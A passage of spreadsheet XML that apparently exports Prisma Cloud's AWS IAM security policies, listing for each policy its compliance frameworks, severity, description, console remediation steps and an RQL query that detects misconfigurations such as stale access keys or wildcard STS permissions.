          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1946" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1946" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-49</t>
        </is>
      </c>
      <c r="AD1946" t="b">
        <v>1</v>
      </c>
      <c r="AE1946" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1946" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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6" t="inlineStr">
        <is>
          <t>e809c246-2ef5-4319-bba9-2c5735d88aa8</t>
        </is>
      </c>
      <c r="AI1946" t="inlineStr">
        <is>
          <t>e809c246-2ef5-4319-bba9-2c5735d88aa8</t>
        </is>
      </c>
      <c r="AJ1946" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1946" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1947">
      <c r="A1947" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CIS v2.0.0 (AWS) - Level 1, GDPR, APRA (CPS 234) Information Security, wells fargo CIS v1.5.0 (AWS) - Level 1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2024.2, NYDFS 23 CRR-NY 500.0, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST SP 800-172, NIST SP 800-171 Revision 2, MITRE ATT&amp;CK v6.3 [Deprecated], CIS v3.0.0 (AWS) Level 1, Matt's ATT&amp;ACK, jbrox - GDPR, CIS v1.4.0 (AWS), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), TX-RAMP Level 1, NIST CSF, Microsoft Cloud Security Benchmark v1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Fedramp (Moderate), MITRE ATT&amp;CK v6.3 [Deprecated], MAS TRM 2021, ACSC Information Security Manual (ISM), TX-RAMP Level 2, MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v12, CIS Controls v8.1, NIST CSF v2.0, PCI DSS v4.0, RBI Baseline Cyber Security and Resilience Requirements, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v12, Insurance Regulatory And Development Authority Of India, jneytchev-fedramp-low, CIS v1.5.0 (AWS) - Level 1, Fedramp (Low), CSA CCM v3.0.1, CIS Controls v7.1, MITRE ATT&amp;CK v8.2 [Deprecated], CHC HITRUST CSF v.9.6.0, NIST 800-171 Rev1, MITRE ATT&amp;CK v12, TX-RAMP Level 2, PCI DSS v3.2.1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v6.3 [Deprecated], CIS v1.3.0 (AWS), MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST 800-53 Rev4, CRI Profile v2.0, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MAS TRM 2021, SOC 2, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, CSA CCM v3.0.1, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, NIST CSF, SOC 2, CIS Controls v8, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, NIST SP 800-171 Revision 3, AWS Well-Architected Framework, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, HITRUST CSF v.11.2.0, HITRUST v.9.4.2 [Deprecated], HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.6, ITSG-33, MAS TRM 2021, HITRUST CSF v.9.6.0, Copy of CIS Controls v8, CSA CCM v4.0.12, MTSBv2_AWS, ITSG-33, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, kfirdaus AWS Account-CS, Brazilian Data Protection Law (LGPD), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Sarbanes Oxley Act (SOX), Matt's ATT&amp;ACK, MITRE ATT&amp;CK v6.3 [Deprecated], NIST SP 800-172, Matt's ATT&amp;ACK, NIST 800-53 Rev 5, HITRUST CSF v9.3 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2)</t>
        </is>
      </c>
      <c r="B1947" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1947" s="2" t="inlineStr"/>
      <c r="D1947" t="n">
        <v>0</v>
      </c>
      <c r="E1947" t="n">
        <v>0</v>
      </c>
      <c r="F1947" t="n">
        <v>35</v>
      </c>
      <c r="G1947" t="b">
        <v>1</v>
      </c>
      <c r="H19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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1947" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1947" t="inlineStr">
        <is>
          <t>AWS access keys not used for more than 45 days</t>
        </is>
      </c>
      <c r="L1947" t="inlineStr">
        <is>
          <t>KEYS_AND_SECRETS</t>
        </is>
      </c>
      <c r="M1947" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1947" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1947" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1947" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1947" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1947" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1947" t="inlineStr"/>
      <c r="T1947" t="b">
        <v>0</v>
      </c>
      <c r="U1947" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1947" t="inlineStr">
        <is>
          <t>aws-iam-get-credential-report</t>
        </is>
      </c>
      <c r="W1947" t="inlineStr">
        <is>
          <t>This policy identifies IAM users for which access keys are not used for more than 45 days. Access keys allow users programmatic access to resources. However, if any access key has not been used in the past 45 days, then that access key needs to be deleted (even though the access key is inactive)</t>
        </is>
      </c>
      <c r="X1947" t="inlineStr">
        <is>
          <t>To delete the reported AWS User access key follow below mentioned URL:
https://aws.amazon.com/premiumsupport/knowledge-center/delete-access-key/</t>
        </is>
      </c>
      <c r="Y1947" t="inlineStr"/>
      <c r="Z1947" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type ='aws' and api.name = 'aws-iam-get-credential-report' AND json.rule = '(access_key_1_active is true and ((access_key_1_last_used_date != N/A and _DateTime.ageInDays(access_key_1_last_used_date) &gt; 45) or (access_key_1_last_used_date == N/A and access_key_1_last_rotated != N/A and _DateTime.ageInDays(access_key_1_last_rotated) &gt; 45))) or (access_key_2_active is true and ((access_key_2_last_used_date != N/A and _DateTime.ageInDays(access_key_2_last_used_date) &gt; 45) or (access_key_2_last_used_date == N/A and access_key_2_last_rotated != N/A and _DateTime.ageInDays(access_key_2_last_rotated) &gt; 45)))'</t>
        </is>
      </c>
      <c r="AA1947" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1947" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1947" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-48</t>
        </is>
      </c>
      <c r="AD1947" t="b">
        <v>1</v>
      </c>
      <c r="AE1947" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1947" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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7" t="inlineStr">
        <is>
          <t>7ca5af2c-d18d-4004-9ad4-9c1fbfcab218</t>
        </is>
      </c>
      <c r="AI1947" t="inlineStr">
        <is>
          <t>29e70fa0-47f7-4812-90bd-ea519e498936</t>
        </is>
      </c>
      <c r="AJ1947" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1947" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1948">
      <c r="A1948" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, APRA (CPS 234) Information Security, HITRUST CSF v.11.2.0, APRA (CPS 234) Information Security, ISO 27002:2022, HIPAA, Matt's ATT&amp;ACK, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, RBI Baseline Cyber Security and Resilience Requirements, Demo_Daryl ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, CIS v3.0.0 (AWS) Level 1, MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, NIST CSF v2.0, MTSBv2_AWS, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS v2.0.0 (AWS) - Level 1, NIST CSF, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ISO/IEC 27002:2013, MLPS 2.0, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, ISO/IEC 27002:2013, NIST SP 800-172, Telecommunications Security Act - TSA, MITRE ATT&amp;CK v6.3 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST SP 800-171 Revision 3, CIS Controls v8.1, ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, TX-RAMP Level 2, ITSG-33, CIS v1.2.0 (AWS), ISO/IEC 27018:2019, CIS v1.5.0 (AWS) - Level 1, kashan ACSC Information Security Manual (ISM), CyberSecurity Law of the People's Republic of China, CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, wells fargo CIS v1.5.0 (AWS) - Level 1, Insurance Regulatory And Development Authority Of India, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, MITRE ATT&amp;CK v8.2 [Deprecated], CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, PCI DSS v4.0, MITRE ATT&amp;CK v12, DORA, Sarbanes Oxley Act (SOX), PCI DSS v3.2.1, Copy of CIS Controls v8, CIS v1.3.0 (AWS), CRI Profile v1.2.1, Risk Management in Technology (RMiT), CIS Controls v8, MITRE ATT&amp;CK v6.3 [Deprecated], CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, ISO/IEC 27002:2013, MITRE ATT&amp;CK v10.0 [Deprecated], jbrox - GDPR, ISO/IEC 27017:2015, CSA CCM v.4.0.1, Australian Cyber Security Centre (ACSC) Essential Eight, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CIS v1.4.0 (AWS), CSA CCM v.4.0.1, AWS Well-Architected Framework, SOC 2, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27001:2022, GDPR, ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, ISO/IEC 27001:2022, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, HITRUST CSF v.9.6.0, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, CCPA 2018, PIPEDA, Demo_Daryl ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, CSA CCM v.4.0.1, Brazilian Data Protection Law (LGPD), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), MITRE ATT&amp;CK v6.3 [Deprecated], FFIEC, MLPS 2.0 (Level 3), PCI DSS v3.2.1, Australian Cyber Security Centre (ACSC) Essential Eight</t>
        </is>
      </c>
      <c r="B1948" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1948" s="2" t="inlineStr"/>
      <c r="D1948" t="n">
        <v>0</v>
      </c>
      <c r="E1948" t="n">
        <v>0</v>
      </c>
      <c r="F1948" t="n">
        <v>22</v>
      </c>
      <c r="G1948" t="b">
        <v>1</v>
      </c>
      <c r="H19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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1948" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1948" t="inlineStr">
        <is>
          <t>AWS IAM user has both Console access and Access Keys</t>
        </is>
      </c>
      <c r="L1948" t="inlineStr">
        <is>
          <t>KEYS_AND_SECRETS</t>
        </is>
      </c>
      <c r="M1948" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1948" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1948" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1948" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1948" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1948" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S1948" t="inlineStr">
        <is>
          <t>CIS</t>
        </is>
      </c>
      <c r="T1948" t="b">
        <v>0</v>
      </c>
      <c r="U1948" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1948" t="inlineStr">
        <is>
          <t>aws-iam-get-credential-report</t>
        </is>
      </c>
      <c r="W1948" t="inlineStr">
        <is>
          <t>This policy identifies IAM users who have both Console access and Access Keys. When an IAM user is created, the Administrator can assign either Console access or Access Keys or both. Ideally the Console access should be assigned to Users and Access Keys for system / API applications, but not both to the same IAM user.</t>
        </is>
      </c>
      <c r="X1948" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console and navigate to the 'IAM' service.
2. Identify the reported IAM user.
3. In 'Security credentials' tab check for presence of Access Keys.
4. Based on the requirement and company policy, either delete the Access Keys or remove the Console access for this IAM user.</t>
        </is>
      </c>
      <c r="Y1948" t="inlineStr"/>
      <c r="Z1948" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type ='aws' and api.name = 'aws-iam-get-credential-report' AND json.rule = 'password_enabled is true and (access_key_1_active is true or access_key_2_active is true)'</t>
        </is>
      </c>
      <c r="AA1948" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1948" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1948" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-47</t>
        </is>
      </c>
      <c r="AD1948" t="b">
        <v>1</v>
      </c>
      <c r="AE1948" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1948" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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8" t="inlineStr">
        <is>
          <t>6a34af3f-21ae-8008-0850-229761d01081</t>
        </is>
      </c>
      <c r="AI1948" t="inlineStr">
        <is>
          <t>6a34af3f-21ae-8008-0850-229761d01081</t>
        </is>
      </c>
      <c r="AJ1948" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1948" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1949">
      <c r="A1949" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, ISO/IEC 27001:2022, CSA CCM v.4.0.1, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO 27002:2022, ISO/IEC 27002:2013, NIST CSF, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, RBI Baseline Cyber Security and Resilience Requirements, HITRUST v.9.4.2 [Deprecated], RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST CSF v2.0, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO/IEC 27017:2015, ISO 27002:2022, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST 800-53 Rev 5, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, ISO 27002:2022, NIST SP 800-172, NIST SP 800-171 Revision 2, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013,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ITSG-33, NIST CSF, TX-RAMP Level 2, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, PCI DSS v3.2.1, ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST CSF, Copy of CIS Controls v8, CRI Profile v1.2.1, Risk Management in Technology (RMiT), CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, CRI Profile v2.0, ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, SOC 2, Demo_Daryl ACSC Information Security Manual (ISM), NIST CSF, SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight, ISO/IEC 27001:2022, CSA CCM v.4.0.1, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, SOC 2, AWS Well-Architected Framework, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST CSF, CSA CCM v.4.0.1, ISO/IEC 27001:2022, TX-RAMP Level 1, NIST CSF, ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, NIST CSF, HITRUST CSF v.9.6.0, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, Brazilian Data Protection Law (LGPD), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, ISO/IEC 27002:2013, DORA, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B1949" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1949" s="2" t="inlineStr"/>
      <c r="D1949" t="inlineStr"/>
      <c r="E1949" t="inlineStr"/>
      <c r="F1949" t="inlineStr"/>
      <c r="G1949" t="b">
        <v>1</v>
      </c>
      <c r="H19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49" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1949" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1949" t="inlineStr">
        <is>
          <t>AWS SageMaker notebook instance IAM policy overly permissive to all traffic</t>
        </is>
      </c>
      <c r="L1949" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1949" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1949" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1949" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1949" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1949" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1949" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S1949" t="inlineStr"/>
      <c r="T1949" t="b">
        <v>0</v>
      </c>
      <c r="U1949" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1949" t="inlineStr">
        <is>
          <t>aws-iam-get-policy-version</t>
        </is>
      </c>
      <c r="W1949" t="inlineStr">
        <is>
          <t>This policy identifies SageMaker notebook instances IAM policies that are overly permissive to all traffic. It is recommended that the SageMaker notebook instances should be granted access restrictions so that only authorized users and applications have access to the service.
For more details:
https://docs.aws.amazon.com/sagemaker/latest/dg/security_iam_id-based-policy-examples.html</t>
        </is>
      </c>
      <c r="X1949" t="inlineStr">
        <is>
          <t>1. Login to AWS console
2. Goto IAM Services
3. Click on 'Policies' in left hand panel
4. Search for the Policy for which the Alert is generated and click on it
5. Under Permissions tab, click on Edit policy
6. Under the Visual editor, for each of the 'SageMaker' Service, click to expand and perform following.
6.a. Click to expand 'Request conditions'
6.b. Under the 'Source IP', remove the row with the entry '0.0.0.0/0' or '::/0'. Add condition with restrictive IP ranges.
7. Click on Review policy and Save changes.</t>
        </is>
      </c>
      <c r="Y1949" t="inlineStr"/>
      <c r="Z1949" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-get-policy-version' AND json.rule = document.Statement[?any((Condition.IpAddress.aws:SourceIp contains 0.0.0.0/0 or Condition.IpAddress.aws:SourceIp contains ::/0) and Effect equals Allow and Action anyStartWith sagemaker:)] exists</t>
        </is>
      </c>
      <c r="AA1949" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1949" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1949" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-563</t>
        </is>
      </c>
      <c r="AD1949" t="b">
        <v>1</v>
      </c>
      <c r="AE1949" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1949" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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49" t="inlineStr">
        <is>
          <t>cd2dd664-59a9-469d-a6d0-d6f4a9f8d94c</t>
        </is>
      </c>
      <c r="AI1949" t="inlineStr">
        <is>
          <t>70f28bb5-c2c3-45be-b1cb-81716b508e34</t>
        </is>
      </c>
      <c r="AJ1949" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1949" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1950">
      <c r="A1950" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO 27002:2022, HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2,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NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, CSA CCM v4.0.12,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kashan ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Australian Energy Sector Cyber Security Framework (AESCSF), Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), Copy of CIS Controls v8, CRI Profile v1.2.1, Risk Management in Technology (RMiT), CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, SOC 2, SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, AWS Well-Architected Framework, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, TX-RAMP Level 1, ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v.9.6.0, CSA CCM v4.0.12, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1950" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1950" s="2" t="inlineStr"/>
      <c r="D1950" t="inlineStr"/>
      <c r="E1950" t="inlineStr"/>
      <c r="F1950" t="inlineStr"/>
      <c r="G1950" t="b">
        <v>1</v>
      </c>
      <c r="H19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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1950" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1950" t="inlineStr">
        <is>
          <t>AWS IAM policy overly permissive to STS services</t>
        </is>
      </c>
      <c r="L1950" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1950" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1950" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1950" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1950" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1950" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1950" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S1950" t="inlineStr"/>
      <c r="T1950" t="b">
        <v>0</v>
      </c>
      <c r="U1950" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1950" t="inlineStr">
        <is>
          <t>aws-iam-get-policy-version</t>
        </is>
      </c>
      <c r="W1950" t="inlineStr">
        <is>
          <t>This policy identifies the IAM policies that are overly permissive to STS services. AWS Security Token Service (AWS STS) is a web service that enables you to request temporary credentials for AWS Identity and Access Management (IAM) users or for users that you authenticate (federated users). It is recommended to follow the principle of least privileges ensuring that only restricted STS services for restricted resources.</t>
        </is>
      </c>
      <c r="X1950" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. Navigate to the 'IAM' service
3. Click on the 'Policies' in left hand panel and Click on the reported IAM policy
4. Under Permissions tab, Change the element of the policy document to be more restrictive so that it only allows restricted STS permissions on selected resources instead of wildcards (sts:* and Resource:*) OR Put condition statement with least privilege access.</t>
        </is>
      </c>
      <c r="Y1950" t="inlineStr"/>
      <c r="Z1950" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name = 'aws-iam-get-policy-version' AND json.rule = isAttached is true and document.Statement[?any(Effect equals Allow and Action contains sts:* and Resource equals * and Condition does not exist)] exists</t>
        </is>
      </c>
      <c r="AA1950" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1950" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1950" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-736</t>
        </is>
      </c>
      <c r="AD1950" t="b">
        <v>1</v>
      </c>
      <c r="AE1950" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1950" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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0" t="inlineStr">
        <is>
